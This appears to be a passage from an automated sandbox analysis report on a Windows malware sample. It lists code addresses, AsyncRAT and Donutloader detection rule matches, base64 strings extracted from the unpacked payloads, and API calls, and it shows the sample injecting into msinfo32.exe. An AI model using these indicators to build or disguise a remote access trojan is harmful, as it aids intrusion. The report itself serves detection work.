            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B971D03_2_00B971D0
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B621C73_2_00B621C7
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B851203_2_00B85120
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B6E90D3_2_00B6E90D
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B6C1503_2_00B6C150
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B8915F3_2_00B8915F
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B62AB93_2_00B62AB9
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B74A803_2_00B74A80
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B6E2E43_2_00B6E2E4
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B8A2C03_2_00B8A2C0
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B802C03_2_00B802C0
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B9B2303_2_00B9B230
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B8AA2F3_2_00B8AA2F
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B72BFB3_2_00B72BFB
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B92BC03_2_00B92BC0
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B773303_2_00B77330
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B69B203_2_00B69B20
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B7F3203_2_00B7F320
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B84B203_2_00B84B20
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B953103_2_00B95310
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B63B763_2_00B63B76
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B71B613_2_00B71B61
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B7D4B03_2_00B7D4B0
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B924803_2_00B92480
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00BA04103_2_00BA0410
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B8DDB03_2_00B8DDB0
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B9F5003_2_00B9F500
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B6E5743_2_00B6E574
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B906A03_2_00B906A0
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B6E6CC3_2_00B6E6CC
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B91E103_2_00B91E10
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B89E603_2_00B89E60
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B797903_2_00B79790
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B9A7903_2_00B9A790
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B6E77F3_2_00B6E77F
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B93F603_2_00B93F60
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 5_2_00000204FD67119C5_2_00000204FD67119C
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 5_2_00000204FD6715785_2_00000204FD671578
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 5_2_00000204FD6719A85_2_00000204FD6719A8
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 5_2_00000204FD6702C05_2_00000204FD6702C0
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 5_2_00000204FD674C545_2_00000204FD674C54
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 5_2_00000204FD67245C5_2_00000204FD67245C
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 11_2_0000027ADED7119C11_2_0000027ADED7119C
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 11_2_0000027ADED7157811_2_0000027ADED71578
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 11_2_0000027ADED702C011_2_0000027ADED702C0
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 11_2_0000027ADED719A811_2_0000027ADED719A8
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 11_2_0000027ADED74C5411_2_0000027ADED74C54
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 11_2_0000027ADED7245C11_2_0000027ADED7245C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: String function: 0029A110 appears 67 times
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: String function: 00B6A110 appears 67 times
            Source: 11.2.msinfo32.exe.27adee40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 2.2.msinfo32.exe.1aa12890000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 11.2.msinfo32.exe.27adef2d008.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 5.2.msinfo32.exe.204fd720000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 5.2.msinfo32.exe.2048000d008.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000003.00000003.1863566508.000002806C4D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000009.00000003.1943122985.00000282C50AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000003.00000003.1863731126.000002806C4F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000000.00000003.1720661736.0000025E727F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000003.1717644946.0000025E727D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000009.00000003.1943224390.00000282C6D25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000009.00000003.1943070023.00000282C6D10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.csCryptographic APIs: 'TransformFinalBlock'
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.csCryptographic APIs: 'TransformFinalBlock'
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, QPC3X8NezKCgQQTAhJOAN.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, QPC3X8NezKCgQQTAhJOAN.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, QPC3X8NezKCgQQTAhJOAN.csCryptographic APIs: 'TransformFinalBlock'
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.csCryptographic APIs: 'TransformFinalBlock'
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.csCryptographic APIs: 'TransformFinalBlock'
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.csBase64 encoded string: 'sqnHl2cvzvVPJFDo4yGMhcu4ge3mYFwlOarj3ROMPJfXcIewYx9T', 'PAJcp0g2rNEoqOljGk7vcgLEzIdg3s3C6ZnLa9QHv1W9STF3ENLn', 'rvpmRaMptQDTyJx06OEzApwF3e0nHAt2Hbz4NdyI6T445MdHhUYS', 'ZsuL3ijdo0WoRZXWkXItPAKBoQ4psayqIdk3Y74hceHfkQjXBsIU2LFIsOoqMQkxRgjjtVuwpjwr9Xuxc7LQ', 'JiVrHCKk3JAYexleEwJlWIfsm84LXEc94bMdZ7vh6B4E9v1ImeqStBRrh69X1X7gKubHjvjms3eUBbsUZ5OF', 'PH7x9n74N0yE6mrLemUXfKZjZtkBFlLIjUc3hu948AJEA1vgtYPBIgABzW7bTnJ5n6rIXqZM5gJrU4rTjwux', 'hXMy3bdZCh4gdkiPk0hem9ViKWzIKYBcAmtHrTUAtNzi0yJviSXPBZoDXMNe7ceCvTP9N26zNrpu3sPzXBct', 'UA8oKGPplJMkL81HcyJ6P8BsxfwpxKXnmnTSHnko5899t5FfAbybuWbNY0l5i2oNdsGvN35MxvhJXlFyPXqQ', 'ZXWejaOLsFGljriJOlJp5DYiDVWyfJMI4AmjcrxajWrBHnZb92jyLMKqcPzmzTvUP56nCBrS0APYaIVi5oRu', 'hgINGRIVzLQtMnFOG7gGY6mj6wkLFY7TQUXRG1r3shLHdFjFDNZTGDFsQ7SeRjHugzsc07C45WMGRMcoUYuL'
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, f7PGrVhFtmc98BagCIsr0.csBase64 encoded string: 'zJwKt0NhO3Y8amV5AW24PPbkaPntpzB7WsbbT56lawJ7wulVaVHS'
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, QPC3X8NezKCgQQTAhJOAN.csBase64 encoded string: 'HCAF333EQi3JVqAZ1ER7Z1mgc8ntqG8kbQbMdVjJqZCmgXhBt7Js', 'RiEuOqT7MaYXVjbwZhoW5ytIlo61bRgwZDqW8ftek0qSoFHL1IJy'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.csBase64 encoded string: 'sqnHl2cvzvVPJFDo4yGMhcu4ge3mYFwlOarj3ROMPJfXcIewYx9T', 'PAJcp0g2rNEoqOljGk7vcgLEzIdg3s3C6ZnLa9QHv1W9STF3ENLn', 'rvpmRaMptQDTyJx06OEzApwF3e0nHAt2Hbz4NdyI6T445MdHhUYS', 'ZsuL3ijdo0WoRZXWkXItPAKBoQ4psayqIdk3Y74hceHfkQjXBsIU2LFIsOoqMQkxRgjjtVuwpjwr9Xuxc7LQ', 'JiVrHCKk3JAYexleEwJlWIfsm84LXEc94bMdZ7vh6B4E9v1ImeqStBRrh69X1X7gKubHjvjms3eUBbsUZ5OF', 'PH7x9n74N0yE6mrLemUXfKZjZtkBFlLIjUc3hu948AJEA1vgtYPBIgABzW7bTnJ5n6rIXqZM5gJrU4rTjwux', 'hXMy3bdZCh4gdkiPk0hem9ViKWzIKYBcAmtHrTUAtNzi0yJviSXPBZoDXMNe7ceCvTP9N26zNrpu3sPzXBct', 'UA8oKGPplJMkL81HcyJ6P8BsxfwpxKXnmnTSHnko5899t5FfAbybuWbNY0l5i2oNdsGvN35MxvhJXlFyPXqQ', 'ZXWejaOLsFGljriJOlJp5DYiDVWyfJMI4AmjcrxajWrBHnZb92jyLMKqcPzmzTvUP56nCBrS0APYaIVi5oRu', 'hgINGRIVzLQtMnFOG7gGY6mj6wkLFY7TQUXRG1r3shLHdFjFDNZTGDFsQ7SeRjHugzsc07C45WMGRMcoUYuL'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, f7PGrVhFtmc98BagCIsr0.csBase64 encoded string: 'zJwKt0NhO3Y8amV5AW24PPbkaPntpzB7WsbbT56lawJ7wulVaVHS'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, QPC3X8NezKCgQQTAhJOAN.csBase64 encoded string: 'HCAF333EQi3JVqAZ1ER7Z1mgc8ntqG8kbQbMdVjJqZCmgXhBt7Js', 'RiEuOqT7MaYXVjbwZhoW5ytIlo61bRgwZDqW8ftek0qSoFHL1IJy'
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.csBase64 encoded string: 'sqnHl2cvzvVPJFDo4yGMhcu4ge3mYFwlOarj3ROMPJfXcIewYx9T', 'PAJcp0g2rNEoqOljGk7vcgLEzIdg3s3C6ZnLa9QHv1W9STF3ENLn', 'rvpmRaMptQDTyJx06OEzApwF3e0nHAt2Hbz4NdyI6T445MdHhUYS', 'ZsuL3ijdo0WoRZXWkXItPAKBoQ4psayqIdk3Y74hceHfkQjXBsIU2LFIsOoqMQkxRgjjtVuwpjwr9Xuxc7LQ', 'JiVrHCKk3JAYexleEwJlWIfsm84LXEc94bMdZ7vh6B4E9v1ImeqStBRrh69X1X7gKubHjvjms3eUBbsUZ5OF', 'PH7x9n74N0yE6mrLemUXfKZjZtkBFlLIjUc3hu948AJEA1vgtYPBIgABzW7bTnJ5n6rIXqZM5gJrU4rTjwux', 'hXMy3bdZCh4gdkiPk0hem9ViKWzIKYBcAmtHrTUAtNzi0yJviSXPBZoDXMNe7ceCvTP9N26zNrpu3sPzXBct', 'UA8oKGPplJMkL81HcyJ6P8BsxfwpxKXnmnTSHnko5899t5FfAbybuWbNY0l5i2oNdsGvN35MxvhJXlFyPXqQ', 'ZXWejaOLsFGljriJOlJp5DYiDVWyfJMI4AmjcrxajWrBHnZb92jyLMKqcPzmzTvUP56nCBrS0APYaIVi5oRu', 'hgINGRIVzLQtMnFOG7gGY6mj6wkLFY7TQUXRG1r3shLHdFjFDNZTGDFsQ7SeRjHugzsc07C45WMGRMcoUYuL'
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, f7PGrVhFtmc98BagCIsr0.csBase64 encoded string: 'zJwKt0NhO3Y8amV5AW24PPbkaPntpzB7WsbbT56lawJ7wulVaVHS'
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, QPC3X8NezKCgQQTAhJOAN.csBase64 encoded string: 'HCAF333EQi3JVqAZ1ER7Z1mgc8ntqG8kbQbMdVjJqZCmgXhBt7Js', 'RiEuOqT7MaYXVjbwZhoW5ytIlo61bRgwZDqW8ftek0qSoFHL1IJy'
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.csBase64 encoded string: 'sqnHl2cvzvVPJFDo4yGMhcu4ge3mYFwlOarj3ROMPJfXcIewYx9T', 'PAJcp0g2rNEoqOljGk7vcgLEzIdg3s3C6ZnLa9QHv1W9STF3ENLn', 'rvpmRaMptQDTyJx06OEzApwF3e0nHAt2Hbz4NdyI6T445MdHhUYS', 'ZsuL3ijdo0WoRZXWkXItPAKBoQ4psayqIdk3Y74hceHfkQjXBsIU2LFIsOoqMQkxRgjjtVuwpjwr9Xuxc7LQ', 'JiVrHCKk3JAYexleEwJlWIfsm84LXEc94bMdZ7vh6B4E9v1ImeqStBRrh69X1X7gKubHjvjms3eUBbsUZ5OF', 'PH7x9n74N0yE6mrLemUXfKZjZtkBFlLIjUc3hu948AJEA1vgtYPBIgABzW7bTnJ5n6rIXqZM5gJrU4rTjwux', 'hXMy3bdZCh4gdkiPk0hem9ViKWzIKYBcAmtHrTUAtNzi0yJviSXPBZoDXMNe7ceCvTP9N26zNrpu3sPzXBct', 'UA8oKGPplJMkL81HcyJ6P8BsxfwpxKXnmnTSHnko5899t5FfAbybuWbNY0l5i2oNdsGvN35MxvhJXlFyPXqQ', 'ZXWejaOLsFGljriJOlJp5DYiDVWyfJMI4AmjcrxajWrBHnZb92jyLMKqcPzmzTvUP56nCBrS0APYaIVi5oRu', 'hgINGRIVzLQtMnFOG7gGY6mj6wkLFY7TQUXRG1r3shLHdFjFDNZTGDFsQ7SeRjHugzsc07C45WMGRMcoUYuL'
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, f7PGrVhFtmc98BagCIsr0.csBase64 encoded string: 'zJwKt0NhO3Y8amV5AW24PPbkaPntpzB7WsbbT56lawJ7wulVaVHS'
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, QPC3X8NezKCgQQTAhJOAN.csBase64 encoded string: 'HCAF333EQi3JVqAZ1ER7Z1mgc8ntqG8kbQbMdVjJqZCmgXhBt7Js', 'RiEuOqT7MaYXVjbwZhoW5ytIlo61bRgwZDqW8ftek0qSoFHL1IJy'
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.csBase64 encoded string: 'sqnHl2cvzvVPJFDo4yGMhcu4ge3mYFwlOarj3ROMPJfXcIewYx9T', 'PAJcp0g2rNEoqOljGk7vcgLEzIdg3s3C6ZnLa9QHv1W9STF3ENLn', 'rvpmRaMptQDTyJx06OEzApwF3e0nHAt2Hbz4NdyI6T445MdHhUYS', 'ZsuL3ijdo0WoRZXWkXItPAKBoQ4psayqIdk3Y74hceHfkQjXBsIU2LFIsOoqMQkxRgjjtVuwpjwr9Xuxc7LQ', 'JiVrHCKk3JAYexleEwJlWIfsm84LXEc94bMdZ7vh6B4E9v1ImeqStBRrh69X1X7gKubHjvjms3eUBbsUZ5OF', 'PH7x9n74N0yE6mrLemUXfKZjZtkBFlLIjUc3hu948AJEA1vgtYPBIgABzW7bTnJ5n6rIXqZM5gJrU4rTjwux', 'hXMy3bdZCh4gdkiPk0hem9ViKWzIKYBcAmtHrTUAtNzi0yJviSXPBZoDXMNe7ceCvTP9N26zNrpu3sPzXBct', 'UA8oKGPplJMkL81HcyJ6P8BsxfwpxKXnmnTSHnko5899t5FfAbybuWbNY0l5i2oNdsGvN35MxvhJXlFyPXqQ', 'ZXWejaOLsFGljriJOlJp5DYiDVWyfJMI4AmjcrxajWrBHnZb92jyLMKqcPzmzTvUP56nCBrS0APYaIVi5oRu', 'hgINGRIVzLQtMnFOG7gGY6mj6wkLFY7TQUXRG1r3shLHdFjFDNZTGDFsQ7SeRjHugzsc07C45WMGRMcoUYuL'
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, f7PGrVhFtmc98BagCIsr0.csBase64 encoded string: 'zJwKt0NhO3Y8amV5AW24PPbkaPntpzB7WsbbT56lawJ7wulVaVHS'
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, QPC3X8NezKCgQQTAhJOAN.csBase64 encoded string: 'HCAF333EQi3JVqAZ1ER7Z1mgc8ntqG8kbQbMdVjJqZCmgXhBt7Js', 'RiEuOqT7MaYXVjbwZhoW5ytIlo61bRgwZDqW8ftek0qSoFHL1IJy'
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@12/3@2/2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002AD4B0 memset,FormatMessageW,memcpy,GetLastError,0_2_002AD4B0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002CF500 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,CreateToolhelp32Snapshot,memset,Module32FirstW,Module32NextW,UnmapViewOfFile,CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,RtlVirtualUnwind,0_2_002CF500
